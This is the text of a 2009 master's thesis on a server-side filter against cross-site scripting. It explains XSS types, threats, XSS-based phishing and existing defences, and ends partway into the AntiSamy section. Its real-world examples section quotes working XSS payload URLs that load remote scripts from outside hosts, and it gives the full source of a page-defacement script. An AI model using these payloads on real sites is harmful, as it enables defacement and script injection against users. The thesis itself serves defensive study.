server side api to secure xss - isea.nitk.ac.inisea.nitk.ac.in/publications/securexss.pdf · side...

143
SERVER SIDE API TO SECURE XSS Thesis Submitted in partial fulfillment of the requirements for the degree of MASTER OF TECHNOLOGY in COMPUTER SCIENCE & ENGINEERING - INFORMATION SECURITY by KAMESH KUMAR BOGANATHAM (07IS04F) DEPARTMENT OF COMPUTER ENGINEERING NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA SURATHKAL, MANGALORE -575025 July, 2009

Upload: others

Post on 24-Jul-2020

8 views

Category:

Documents


2 download

TRANSCRIPT

  • SERVER SIDE API TO SECURE XSS

    Thesis

    Submitted in partial fulfillment of the requirements for the degree of

    MASTER OF TECHNOLOGY in

    COMPUTER SCIENCE & ENGINEERING - INFORMATION

    SECURITY

    by

    KAMESH KUMAR BOGANATHAM

    (07IS04F)

    DEPARTMENT OF COMPUTER ENGINEERING

    NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA

    SURATHKAL, MANGALORE -575025

    July, 2009

  • NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL ----------------------------------------------------------------------------------------------------

    D E C L A R A T I O N

    I hereby declare that the Report of the P.G. Project Work entitled “SERVER

    SIDE API TO SECURE XSS” which is being submitted to National Institute of

    Technology Karnataka Surathkal, for the award of degree of Master of Technology in

    Computer Science and Engineering – Information Security in the Department of

    Computer Engineering, is a bonafide report of the work carried out by me. The material

    contained in this report has not been submitted to any university or Institution for the

    award of any degree.

    07IS04F, B KAMESH KUMAR

    -----------------------------------------------------

    (Register Number, Name and Signature of Student)

    Department Computer Engineering

    Place: NITK, SURATHKAL Date:

  • C E R T I F I C A T E

    This is to certify that the P.G Project Work Report entitled “SERVER SIDE API TO

    SECURE XSS” submitted by B KAMESH KUMAR (Reg.No. 07IS04F) as the record of

    the work carried out by him, is accepted as the P.G Project Work Report Submission in

    partial fulfillment of the requirements for the award of degree of Master of Technology in

    Computer Science and Engineering – Information Security in the Department of

    Computer Engineering, National Institute of Technology Karnataka, Surathkal.

    External Guide

    (Mr. Radhesh Mohandas )

    Adjunct Faculty

    Department of Computer Engineering

    NITK Surathkal

    Internal Guide

    ( Mr. Alwyn R Pais)

    Senior Lecturer

    Department of Computer Engineering

    NITK Surathkal

    Chairman- DPGC

  • DEDICATED TO

    THEIR LORDSHIPS

    SRI SRI RADHA VRINDAVANA CHANDRA

  • ACKNOWLEDGEMENTS

    I take this opportunity to express my deepest gratitude and appreciation to all

    those who have helped me directly or indirectly towards the successful completion of this

    project.

    First and foremost, I would like to express my sincere appreciation and gratitude

    to my esteemed guides Mr. Radhesh Mohandas, Adjunct Faculty and Mr. Alwyn R

    Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal for their

    insightful advice, encouragement, guidance, critics, and valuable suggestions throughout

    the course of my project work. Without their continued support and interest, this thesis

    would not have been the same as presented here.

    I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head,

    Department of Computer Engineering, National Institute of Technology Karnataka,

    Surathkal for his constant co-operation, support and for providing necessary facilities

    throughout the M.Tech program.

    I would like to take this opportunity to express my thanks towards the teaching

    and non- teaching staff in Department of Computer Engineering, NITK for their

    invaluable help and support in these two years of my study. I am also grateful to all my

    classmates for their help, encouragement and invaluable suggestions.

    My special thanks to my parents, supporting family and friends who continuously

    supported and encouraged me in every possible way for successful completion of this

    thesis. I am forever indebted to you all.

    B Kamesh Kumar

  • This Page is intentionally left blank

  • ABSTRACT

    With Internet becoming ubiquitous in every aspect of our life, there is an increase in the

    web applications providing day to day services like banking, shopping, mailing services, news

    updates, etc. But most of these applications have vulnerabilities or security loopholes like Cross

    site scripting (XSS), Cross-site request forgery (CSRF), SQL Injection which are being exploited

    by the hackers for malicious purposes. Hence there is a need for API’s/automated security tools

    to identify and/or prevent these vulnerabilities before the application goes live.

    This work focuses on developing a server side API for Cross-site Scripting which

    differentiates XSS attack from simple script. Thus novice users can enjoy the safe and better

    experience of browsing without any surge of functionality, need of additional software or

    configuration at browser side. Developing such API also reduces burden to web administrators to

    safe guard their web applications from malignant XSS attacks.

    Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request forgery

    (CSRF/XSRF), Server-side XSS Filter.

  • This Page is intentionally left blank

  • i

    TABLE OF CONTENTS

    Page No.

    Title

    Declaration

    Certificate

    Dedication

    Acknowledgement

    Abstract Table of contents i

    List of figures iv

    List of tables v

    Nomenclature/Acronyms vi

    Chapter I INTRODUCTION 1

    1.1 Cross-site Scripting Attacks 2 1.2 Motivation 2 1.3 Organization of Thesis 3

    Chapter II CROSS-SITE SCRIPTING 4

    2.1 Introduction to Cross-site Scripting 4

    2.2 A Basic Example 5

    2.3 Malicious Code 5

    2.4 Classification of Cross-site Scripting 9

    2.4.1 Reflected XSS 9

    2.4.2 Stored XSS 10

    2.4.3 DOM – based XSS 10

    2.5 Threats from Cross-site Scripting 11

  • ii

    2.6 Cross-site Scripting and Phishing 12

    2.6.1 Introduction to Phishing 12

    2.6.2 Phishing Tricks 13

    2.6.3 Cross-Site Scripting based Phishing Attack 14

    2.7 Real World Examples 14

    2.8 XSS Vs. CSRF 18

    Chapter III EXISTING XSS DEFENSES 20

    3.1 AntiSamy 21

    3.2 The strip_tags() 24

    3.3 PHP Input Filter 25

    3.4 HTML_Safe/SafeHTML 25

    3.5 Kses 26

    3.6 htmLawed 28

    3.7 Safe HTML Checker 28

    3.8 HTML Purifier 29

    3.9 Summary 29

    Chapter IV PROBLEM STATEMENT 30

    Chapter V DIFFERENTIATING XSS FROM SIMPLE SCRIPTS 31

    Chapter VI IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS

    39

    6.1 Procedure 39

    6.2 Implementation Details 40

    6.3 Working of SecureXSS 41

    6.4 Results 43

    Chapter VII CONCLUSIONS 45

  • iii

    REFERENCES 46

    APPENDIX I OWASP The Ten Most Critical Web Application

    Security Vulnerabilities

    48

    APPENDIX II Results of SecureXSS API 51

    APPENDIX III Results of HTML Purifier 80

    APPENDIX IV Simple HTML DOM Parser array 95

    Resume (Bio-Data) 125

  • iv

    LIST OF FIGURES

    Fig. No. Descripton

    Page No.

    2.1 Sample PHP Code for Site Search Engines 6

    2.2 Sample HTTP Response Page Containing the Tag 6

    2.3 Cross-Site Scripting in Site Search Engines 7

    2.4 Sample Malicious Code for Cookie Theft 7

    2.5 An Attack Scenario of Cross-Site Scripting 8

    2.6 Examples of Phishing Tricks 13

    2.7 Cross-Site Scripting based Phishing Attack 15

    2.8 Maria Sharapova’s Home Page 16

    2.9 Defacement 18

    6.1 Server-side XSS Filtering API 41

    6.2 SecureXSS overhead 44

    1 MITRE data on Top 10 web application vulnerabilities for 2006 48

  • v

    LIST OF TABLES

    Table No. Descripton

    Page No.

    3.1 Kses API’s 26

    5.1 Tags and its attributes which are in favour of attackers 31

    5.2 Extensions allowed 34

    5.3 DOM Properties which will cause XSS attacks 37

    6.1 SecureXSS timing test (overhead) results 43

    1 OWASP Top 10 Web Application Vulnerabilities 49

    2 Results of SecureXSS 51

    3 Results of HTML Purifier 80

  • vi

    Nomenclature/Acronyms

    Notation Description

    XSS Cross-site Scripting

    OWASP Open Web Application Security Project

    XSRF/CSRF Cross-site Request Forgery

    PHP Hypertext Pre Processor

    URL Uniform Resource Locator

    URI Uniform Resource Identifier

    HTML Hyper Text Markup Language

    HTTP Hyper Text Transfer Protocol

  • This Page is intentionally left blank

  • 1

    CHAPTER 1

    INTRODUCTION

    With the proliferation of the Internet, there has been a surge in the web services being

    offered by many corporations like e-banking, e-shopping, etc. As most of these applications are

    not developed with best security practices, there is an increase in the malicious attacks against

    these services, which exploits the vulnerabilities in these applications to acquire material gains or

    to steal the credentials of the novice users who use these web services. This has resulted in more

    research focus in this domain to create new tools and techniques to subvert these kinds of

    attacks. There are many research groups in academics and industry working in this domain to

    find out more secure programming practices and tools to identify the vulnerability of these

    applications during development phase and attacks during the real time.

    The OWASP Top 10 report [OWA] lists the following as the ten most critical web

    application security vulnerabilities that are been exploited:

    Cross Site Scripting (XSS)

    Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc)

    Malicious File Execution

    Insecure Direct Object Reference

    Cross Site Request Forgery (CSRF)

    Information Leakage and Improper Error Handling

    Broken Authentication and Session Management

    Insecure Cryptographic Storage

    Insecure Communications

    Failure to Restrict URL Access

    In this work, we focused on Cross-site Scripting (XSS), which facilitates the hacker to

    insert some malicious script to the web application that may cause any kind of harm to legitimate

    user. In the process, we developed a server side XSS filtering API, which differentiates Potential

    XSS attack from the simple XSS and strips it off. The main goal of this work is to provide a XSS

  • 2

    solution to web administrators to safe guard their applications from attackers, which results in

    safe and better experience browsing to lame user without any surge in functionality.

    1.1 Cross-site Scripting Attacks

    Cross-site scripting attack method was first discussed in a CERT advisory back in 2000

    [CER]. But, even today cross-site scripting (XSS) is one of the most common vulnerabilities in

    web applications. It happens as a result of insufficient filtration of data received from a malicious

    person and then sent to third parties. Systems that receive data from users and display it on other

    users' browsers are very vulnerable to an XSS attack. Wikis, forums, chats, web mail - are all

    good examples of applications most susceptible to XSS.

    Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts

    malicious code into a page returned by a web server trusted by a user. This code may reside on

    the web server or be explicitly inserted when the user browses to the particular web site, it may

    contain JavaScript or just HTML, and it may use third party sites as sources or rely only upon the

    resources of the targeted server. The XSS attacks typically involve JavaScript code from a

    malicious web server executing on a user's web browser. Chapter 2 gives the brief knowledge

    about XSS attack and its types with examples and illustration.

    1.2 Motivation

    In the last years, dynamic Web applications such as online banking systems and online

    shops are becoming more and more popular. At the same time, security attacks that exploit Web

    application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site

    Scripting is the most common security issue (as it is already said, it is the top most vulnerability

    as per OWASP 2007 report), which enables attackers to steal credentials from a victim to gather

    sensitive information or cause a Web site to be unavailable. To mitigate such serious impact,

    Web applications should use an effective solution for Cross-Site Scripting flaws. Manual

    security testing (for mitigation) is however both expensive and error prone due to the increasing

    complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws

    are essential.

  • 3

    We have investigated some available solutions which claim to be state-of-the-art.

    Unfortunately, most of them are not effective solutions as they fail in differentiating simple

    scripts from potential XSS attack. Therefore, we have developed SecureXSS (pronounce as

    Secure Excess), an open-source server-side filter for detecting and filtering Cross-Site Scripting

    vulnerabilities in Web applications.

    1.3 Organization of Thesis

    The rest of the thesis is organized as follows. Chapter 2 gives the brief information about

    XSS attack and its types with live examples and illustration. Chapter 3 deals with the available

    solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our

    solution to mitigate XSS which is called SecureXSS: Server-side XSS Filter. Chapter 6 gives the

    implementation details and experimental results and Chapter 7 concludes the thesis along with

    the future work, followed by the references used. Appendix I details the Top 10 most critical web

    application vulnerabilities. Appendix II shows the results of SecureXSS API, while Appendix III

    shows results of HTML Purifier and Appendix IV shows the Simple HTML DOM Parser Array.

  • 4

    CHAPTER 2

    CROSS-SITE SCRIPTING

    Cross-Site Scripting vulnerabilities are quite widespread. Just taking a look at the

    Bugtraq mailing list, innumerable postings alarming Cross-Site Scripting holes are listed

    regularly. As mentioned in the introduction chapter, Cross-Site Scripting vulnerabilities are the

    most common security loopholes found in over 80 percent of Web sites. Hence, the likelihood

    that a Web site is XSS vulnerable is extremely high. According to the Information-Technology

    Promotion Agency (IPA), from July 2004 to September 2005, attacks using Cross-Site Scripting

    are the most serious issue among all Web application attacks (was accounted for 42%), while

    SQL Injection is ranked second with 16%. Thus, it is imperative to make Web applications

    secure against XSS attacks.

    In this chapter, we start by briefly explaining the XSS problem with a basic example, and

    then we give an introduction to malicious code and how XSS attacks work. After presenting the

    classification of XSS, we describe the risks that XSS may cause.

    2.1 Introduction to Cross-site Scripting

    As introduced in the previous chapter, Web applications are becoming not only

    increasingly popular, but also more and more vulnerable. Attack techniques exploiting various

    types of Web application vulnerabilities are becoming more and more sophisticated. A particular

    class of these attack techniques is referred to as Cross-Site Scripting (or HTML Code Injection),

    which takes advantage of the failure of Web applications, that do not validate user input before

    displaying it back to the user. Such attacks involve commonly three parties: the user (victim), the

    attacker, and the website, which is XSS vulnerable. The attacker uses the poorly designed

    legitimate website as a vehicle to execute malicious code (as it was originated from a trusted

    source) in the user’s browser.

    As explained above, XSS attacks occur when an attacker uses a web application to send

    malicious code (generally in the form of a browser side script,) to a different end user. Flaws that

    allow these attacks to succeed are quite widespread and occur anywhere in a web application, it

  • 5

    uses input given by user in the output it generates, without validating or encoding it. An attacker

    can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no

    way to know that the script should not be trusted, and will execute the script. Because it thinks

    the script came from a trusted source and have the malicious script can access cookies, session

    tokens, or other sensitive information retained by your browser and used with that site. These

    scripts can even rewrite the content of the HTML page [XSS].

    2.2 A Basic Example

    Most web applications contain site search engines. Such site search engines usually

    display the results on the screen together with the search phrase entered by users. As an example

    consider the PHP code shown in figure 2.1, in which the text after “Search results for” is

    generated dynamically according to the user input. When the search phrase (user input) is not

    sanitized properly, Cross-Site Scripting may occur which can also be an attack. As illustrated in

    figure 2.3 (a), after clicking on the search button, we get the search phrase entered in the form

    field (here search text) displayed in the response page, regardless of the search results. We

    experiment now with HTML tags, as illustrated in figure 2.3 (b), the search phrase returned (here

    Hello World) is formatted as bold, instead of displaying the text we entered (Hello World

    embedded in the HTML tag ). Besides displaying the formatted search phrase, we can also

    cause JavaScript code to be executed in the browser (most browsers enabled JavaScript by

    default). As illustrated in figure 2.3 (c), in place of showing the search phrase, a JavaScript alert

    box with the text XSS Vulnerability popped up. It is for the reason that browser interprets the

    search phrase we entered as HTML tag instead of text. In the sample HTTP response page shown

    in figure 2.2, the tag introduces a JavaScript program and thus it is not displayed by

    the browser.

    2.3 Malicious Code

    Considering the example above, one may ask, it just throws up an alert box, how dangerous can

    it be? Right, alert pop ups are annoying; however they do not really cause security issues. We

    just use it to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert

    function can be executed, there is commonly no reason that other JavaScript functions containing

    malicious code cannot succeed.

  • 6

    Figure 2.1: Sample PHP Code for Site Search Engines

    Figure 2.2: Sample HTTP Response Page Containing the Tag

    (a) Search for a Simple Text

    (b) Search for a Formatted Text

  • 7

    (c) Search for an Executable Script

    Figure 2.3: Cross-Site Scripting in Site Search Engines

    Attackers exploit XSS vulnerabilities in order to execute the injected malicious code.

    What on earth does malicious code mean? Which impact may it cause? Next, we will give an

    introduction to malicious code.

    Most Web browsers are able to run scripts embedded in Web pages downloaded from a

    Web server by default. Such scripts are usually written in various scripting languages such as

    JavaScript and VBScript, which are introduced by the HTML scripting tag . In

    addition to the scripting tags, many other HTML tags (like tag) can be misused to load

    malicious code.

    Malicious code is able to rewrite an HTML page with fraudulent content, or redirect the

    client’s browser to the page of attackers; it can even access authentication cookies, session

    management tokens, or other sensitive information. With this information, an attacker is able to

    hijack the victim’s active session and thus, bypass the authentication process completely.

    Consider the script in figure 2.4, when this script is injected into a page of the site (e.g.

    www.xss.site) successfully and a victim’s browser loads this page, the embedded script will be

    executed and store the victim’s cookie from this site. Now, the attacker is able to access the

    victim’s account and masquerade himself as the victim. (Figure 2.5 illustrates this scenario)

    Figure 2.4: Sample Malicious Code for Cookie Theft

  • 8

    Figure 2.5: An Attack Scenario of Cross-Site Scripting

    Steps shown in the Figure 2.5 is explained below in details.

    (1) A user logs in a XSS vulnerable site.

    (2) The site sets cookies (e.g. ID=123) to the user, which is saved in the browser.

    (3) An attacker knows that the site displays a parameter without validating (e.g. the parameter

    “name”), he constructs a link with the malicious code described in figure 2.4 and tricks the user

    into clicking on this link.

    (4) The unsuspecting user clicks on the link and an HTTP request containing the malicious code

    from the attacker is sent to the XSS vulnerable site.

    (5) According to the request, the site generates response page having malicious code embedded

    and displays this page to the user.

  • 9

    (6) While user views the response page, the malicious code gets executed in the user’s browser,

    cookies of that web site are sent to the attacker.

    (7) The attacker has now access to the user’s account and can masquerade himself as the user.

    The possible sources of malicious code include URL query string, HTML form fields,

    HTTP headers and cookies, etc. Since malicious code is embedded in the user’s trusted websites,

    it is allowed to perform dangerous operations smoothly. Websites using SSL are not more

    protected against malicious code than those general websites. SSL only encrypts data (including

    the malicious code) transmitted in the connection, it does not attempt to validate data. Therefore,

    XSS attacks can be achieved as usual, except that they occur in an encrypted connection.

    2.4 Classification of Cross-site Scripting

    Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected

    (non-persistent), Stored (persistent) and DOM - based. Before we describe these three categories,

    we should learn about DOM, to understand the third type of XSS.

    The Document Object Model (DOM) is a cross-platform and language-independent

    convention for representing and interacting with objects in HTML, XHTML and XML

    documents. Objects under the DOM (also sometimes called "Elements") may be specified and

    addressed according to the syntax and rules of the programming language used to manipulate

    them. In simple terms, the Document Object Model is the way JavaScript sees its containing

    HTML page and browser state. Next, we will describe these three categories respectively.

    2.4.1 Reflected XSS

    Reflected XSS (also referred to as non-persistent XSS) is by far the most common type,

    which implicates that after a request, the page containing malicious code is returned to the Web

    browser immediately.

    Normally, a non-persistent XSS attack requires deceiving a user into visiting a specially

    manipulated URL with embedded malicious code using social engineering techniques. When a

    user is tricked into clicking on the malicious link, it causes the code embedded in the URL to be

    executed in the Web browser, and the attack is achieved.

  • 10

    2.4.2 Stored XSS

    In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) implicates

    that when the malicious code is injected to a website; it is stored (in a database or XML files)

    over a longer period, and displayed to users in a webpage later. This kind of XSS is more serious

    than other types, because an attacker can inject malicious code just once, and affect a large

    number of unsuspecting users, it is even hardly necessary for attackers to trick the users into

    clicking on a link containing malicious code. For example, if the malicious code is stored in a

    database, without clicking on any link, the innocent user may become victim by just viewing the

    page that contains the stored malicious code.

    There is another kind of stored XSS that uses techniques to manipulate user’s cookies.

    With such techniques, attackers are able to tamper the cookie content with malicious code and

    cause the code to be executed each time when the user visits the website.

    Examples of web applications, which are especially vulnerable by stored XSS, often

    include discussion forums, guest books, webmail systems, etc. RSS feeds that are popularly used

    in web blogs, news sites can also be used as vehicle to achieve such attacks.

    Here is the real world example of a persistent XSS attack that occurred on the most

    popular online auction website eBay. As reported by US-CERT16 in April 2006, when an eBay

    user posts an auction, tags are allowed to be included in the auction description,

    which creates a XSS vulnerability in the eBay Web site. Attackers are exploiting this

    vulnerability to redirect auction viewers to a fake eBay login page that requests login information

    to steal credentials [USC].

    2.4.3 DOM – based XSS

    Besides the XSS attacks described above, which are considered as standard XSS, there is

    also a third kind of XSS attack, namely, DOM-based XSS. Unlike the standard XSS attacks,

    which rely on the dynamic web pages, a DOM-based XSS attack does not require sending

    malicious code to the server necessarily and thus can also use static HTML pages.

  • 11

    The problem is addressed in the client-side script (i.e. JavaScript) within a page itself,

    which retrieves data from certain DOM objects without encoding the URL characters. The DOM

    objects mentioned here include:

    - document.location - document.URL - document.referrer

    We make this clear by means of a simple example. Assuming that the following script

    resides within a HTML page, this script displays the text retrieved from the current URL

    somewhere in the page.

    document.write(document.URL);

    When we enter the following URL into the address bar in a browser, we will get an alarm

    box with the text “XSS”, thus it results in XSS hole.

    http://www.xss.site/index.html#alert("XSS")

    2.5 Threats from Cross-site Scripting

    Some of the common threats from XSS attacks are listed below:

    Cookie theft and account hijacking: one of the most severe XSS attack involves cookie

    theft and account hijacking as the scenario illustrated previously in figure 2.5. Credentials

    stored in cookies can be stolen by attackers, thus it is possible for attackers to steal user’s

    identity and access his confidential information. For normal users, this means that their

    personal data such as credit card information or bank account may be misused. For users

    having high privileges such as administrators, if their accounts are stolen via XSS,

    attackers are able to access the web server and the backend database system, and thus

    have the full control of the web application.

    Misinformation: another critical threat from XSS is the danger of credentialed

    misinformation. XSS attacks may include malicious code, which can spy on user’s surf

    behavior and thus gain statistics (i.e. logging user’s clicks or history of sites visited).

    Consequently, it results in loss of privacy. Another kind of misinformation is that

  • 12

    malicious code is able to modify the presentation of page content, once it is executed in a

    browser. This enables an attacker to manipulate a press release or important news, even

    to alter the stock price of companies, which results in loss of integrity. Malicious script

    may also modify the login page, together with Phishing; a victim may submit his login

    information to the attacker unconsciously.

    Denial of Service: In view of an enterprise, it is imperative that their Web applications

    are should be accessible all the time. However, malicious script can lead to loss of

    availability. For example, it can redirect users’ browser to other websites. The spread of

    the XSS worm on Myspace.com described previously is another example of a Denial of

    Service attack. In view of users, malicious script can also make a user’s browser crash or

    become inoperable (i.e. by throwing infinitely many alert boxes), so that the user cannot

    reach the Web application any more.

    Browser exploitation: malicious script can redirect client browsers to an attacker’s site,

    so that the attacker is able to take advantage of specific security hole in web browsers to

    control users’ computer by executing arbitrary commands, such as to install Trojan horse

    programs on the client or upload local data containing sensitive information.

    2.6 Cross-site Scripting and Phishing

    This part of the thesis will give a brief explanation about phishing kind of cross site

    scripting. Section 2.6.1 Will give introduction about phishing and Section 2.6.2 will explain some

    tricks of the phishing, while Section 2.6.3 explains cross-site scripting based phishing attacks.

    2.6.1 Introduction to Phishing

    Phishing (as in fishing for sensitive data), is the act of tricking someone into giving them

    sensitive information like credit card numbers, passwords, bank account information, or other

    personal data using social engineering techniques [STA, OLL].

    Phishing uses usually emails as medium, which look like coming from banks, ask users to

    log into their online-banking system, or change their password, or input their credit card number.

    In the last years, Phishing has become a major issue, according to the Pew Study [PEW], in

  • 13

    October 2005, more than a third of email users suffered Phishing, and two percent have

    responded by providing personal financial information.

    (a) Similar or Misspelled Domain Names

    (b) URL Hex Encoding

    (c) Using HTML Coding to Hide the Real Link

    Figure 2.6: Examples of Phishing Tricks

    2.6.2 Phishing Tricks

    Tricks commonly used for Phishing include:

    Similar or misspelled domain names (see figure 2.6(a)). Phisher’s may also substitute the

    lowercase of “L” with the uppercase of “I”, because they are hard for the users to

    distinguish.

    Using encoded URL. These tricks are used to encode the URL to disguise its true value

    by using Hex, Unicode, or UTF-8 encoding. An example of Hex Encoding is illustrated

    in figure 2.6(b).

    Using HTML coding to hide the real link (see figure 2.6(c)). The real link is not directly

    visible to the user. As soon as he clicks the link, he is taken to the fake site of the attacker

    instead of the site indicated.

    Using fake banner advertising. Phisher’s can use copied banner advertising and publish it

    on the Internet. Similar to the example above, the destination is linked to the fake site,

    and it is not directly visible to the users.

  • 14

    2.6.3 Cross-Site Scripting based Phishing Attack

    The Phishing tricks described above misdirect users to fake sites. But if the Phishing site

    is the real site, this kind of Phishing attack is more dangerous, since users trust the real site. Such

    attacks can be achieved, when a site is XSS vulnerable. The example below will demonstrate

    sample of this attack.

    For a Cross-site Scripting based Phishing attack; the following steps should be taken:

    1. Finding Cross-site Scripting vulnerabilities in a site.

    2. Embedding malicious content into a fraudulent email. Attacker could use encoded URL

    to obfuscate the true destination.

    3. Sending the spoofed email to victims.

    When a user clicks the link in the spoofed email, the login part of the page returned is

    replaced with the fake login page from the attacker’s site, other contents of the page and the

    address bar remain unchanged. The user is not aware of this and logs in with his personal

    information, which will be sent to the attacker. After login, the user will be redirected back to the

    real site. Figure 2.7 illustrates this scenario.

    XSS based Phishing attacks can bypass the traditional Phishing defenses such as

    blacklists, SSL notices, etc. The first step to achieve XSS based Phishing attack is to find XSS

    vulnerabilities in an insecure Web site.

    2.7 Real World Examples

    On April 1, 2007, there was an interesting prank on Maria Sharapova’s (the famous Tennis

    player) home page (Figure 2.8). Apparently someone has identified an XSS vulnerability, which

    was used to inform Maria’s fan club that she is quitting her carrier in Tennis to become a CISCO

    CCIE Security Expert.

    The URL that causes the XSS issue looks like the following:

  • 15

    http://www.mariasharapova.com/defaultflash.sps?page=//%20--

    %3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/scri

    pt%3E%3C!--&pagenumber=1

    Figure 2.7: Cross-Site Scripting based Phishing Attack

  • 16

    Notice that the actual XSS vulnerability affects the page GET parameter, which is also

    URL-encoded. In its decoded form, the value of the page parameter looks like this:

    // --> comments out everything

    generated by the page up until that point. The second part of the payload includes a remote script

    hosted at www.securitylab.ru. And finally, the last few characters on the URL make the rest of

    the page disappear.

    Figure 2.8 Maria Sharapova’s Home Page

    The script hosted at SecurityLab has the following content:

    document.write("Maria Sharapova"); document.write("Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE.

    Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers down.

  • 17

    Let’s have a look at the following example provided by RSnake from ha.ckers.org.

    RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS

    defacement on every page where it is included. The script is defined like this:

    var title = "XSS Defacement"; var bgcolor = "#000000"; var image_url = "http://ha.ckers.org/images/stallowned.jpg"; var text = "This page has been Hacked!"; var font_color = "#FF0000"; deface(title, bgcolor, image_url, text, font_color); function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) { document.title = pageTitle; document.body.innerHTML = ''; document.bgColor = bgColor; var overLay = document.createElement("div"); overLay.style.textAlign = 'center'; document.body.appendChild(overLay); var txt = document.createElement("p"); txt.style.font = 'normal normal bold 36px Verdana'; txt.style.color = fontColor; txt.innerHTML = pageText; overLay.appendChild(txt); if (image_url != "") { var newImg = document.createElement("img"); newImg.setAttribute("border", '0'); newImg.setAttribute("src", imageUrl); overLay.appendChild(newImg); } var footer = document.createElement("p"); footer.style.font = 'italic normal normal 12px Arial'; footer.style.color = '#DDDDDD'; footer.innerHTML = title; overLay.appendChild(footer); }

    In order to use the script we need to include it the same way we did when defacing Maria

    Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:

    http://www.mariasharapova.com/defaultflash.sps?page=//%20--

    %3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script

    %3E%3C!--&pagenumber=1

    The result of the defacement is shown on Figure 2.9. Website defacement, XSS based or

    not, is an effective mechanism for manipulating the masses and establishing political and non-

    political points of view. Attackers can easily forge news items, reports, and important data by

    using any of the XSS attacks. It takes only a few people to believe what they see in order to turn

    something fake into something real.

  • 18

    Examples explained here are taken from [JEG], refer the same for many more real world

    XSS attacks and examples.

    Figure 2.9 Defacement

    2.8 XSS Vs. CSRF

    Cross-Site Scripting (XSS) and Cross-site Request Forgery (CSRF) attacks are frequently

    confused as they are clearly related [RRO]. Both attacks are aimed at the user and often require

    the victim to access a malicious web page. Also the potential consequences of the two attack

    vectors can be similar: The attacker is able to submit certain actions to the vulnerable web

    application using the victim's identity. The causes of the two attack classes are different though.

    A web application that is vulnerable to XSS fails to properly sanitize user provided data before

    including this data on a webpage, thus allowing an attacker to include malicious JavaScript in the

    web application. This JavaScript consequently is executed by the victim's browser and initiates

    the malicious requests. XSS attacks have more capabilities beyond the creation of http request

    and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited

    power over the webpage it is embedded in and is able to communicate with the attacker. As an

    example, XSS can obtain and leak sensitive information.

    Cross Site Scripting (XSS) exploits the trust that a client has for the website or

    application. Users generally trust that the content displayed in their browsers is same as that it is

  • 19

    intended to be displayed by the website being viewed. In contrast, CSRF exploits the trust that a

    site has for the user. The website assumes that if an 'action request' was performed, it believes

    that the request is being sent by the user [ROB].

    An attacker exploits a lack of input and / or output filtering in the case of XSS flaw.

    Filtering out the dangerous characters like , “, ‘, &, ;, or # in an application could resolve the

    XSS flaw. XSS is related to the application performing insufficient data validation. XSS flaws

    may allow bypassing of any CSRF protections by leaking valid values of the tokens, allowing

    Referrer headers to appear to be an application itself, or by hosting hostile HTML and JavaScript

    elements right in the target application. Therefore resolving XSS flaws should be given priority

    over CSRF weaknesses [CSRF].

    XSS aimed at inserting active code in an HTML document to either abuse client-side

    active scripting holes, or to send privileged information (e.g. authentication/session cookies) to a

    attacker controlled site. CSRF does not in any way rely on client-side active scripting, and its

    aim is to take unwanted, unapproved actions on a site where the victim has some prior

    relationship and authority.

    Where XSS sought to steal the online trading cookies so an attacker could manipulate the

    victim’s portfolio, CSRF seeks to use the victim’s cookies to force the victim to execute a trade

    without his knowledge or consent.

  • 20

    CHAPTER 3

    EXISTING XSS DEFENSES

    There is dire need for web applications to provide users with the ability to format their

    profile or postings using Hypertext Markup Language / Cascading Style Sheet (HTML/CSS). To

    attain that functionality, developers must allow users to provide their own source code directly or

    give the user an intermediate language with which the user can work.

    As the simple solutions, there are many lightweight markup languages apart from HTML

    available like BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX], WYSIWYG,

    which will be parsed by message board system before being translated to markup language that

    web browsers understand (can be HTML or XHTML).

    An example intermediate language code for rendering green text can be shown below.

    [color=green]Sample Text[/color]

    After translation the above code would be rendered to the user’s browser in the target

    language, HTML/CSS as seen below

    Sample Text

    This is a safe approach in general because it does not allow users to specify arbitrary

    target language code which can be obfuscated and disguised using various encoding and

    fragmenting techniques. By providing an intermediate language and interpreting it in a top-down

    fashion the application can only render the subset of HTML functionality that they wish to

    interpret.

    There is a practical problem with this approach. The user will be fairly limited in

    formatting code because of limited instruction set provided by the web application is unlikely to

    ever be as complete as the HTML/CSS specifications. However the attributes/ values provided

    with the attributes in any of these markup languages are not vulnerable, still they face problems

    related to the way they translate the unknown markup language into secure HTML/XHTML (i.e.,

    the translated HTML cannot be secure).

  • 21

    The other option when providing formatting capability is to allow users to input

    HTML/CSS directly. If user’s input cannot be trusted, it is imperative that the application be able

    to detect and remove any malicious code. To detect and remove such malicious code, there are

    some solutions developed. In this Chapter we’ll see such solutions one by one in detail.

    3.1 AntiSamy

    The primary focus of developers while developing AntiSamy [ANT] (in reference to

    Samy Kamkar’s now infamous MySpace XSS worm.) is to create a XSS filter that works on a

    positive and customizable security model. The secondary focus was to make this tool as user

    friendly as possible so as to allow applications using it to communicate to the user how their

    input was filtered or how they could tune it themselves in order to accommodate a more

    successful filter.

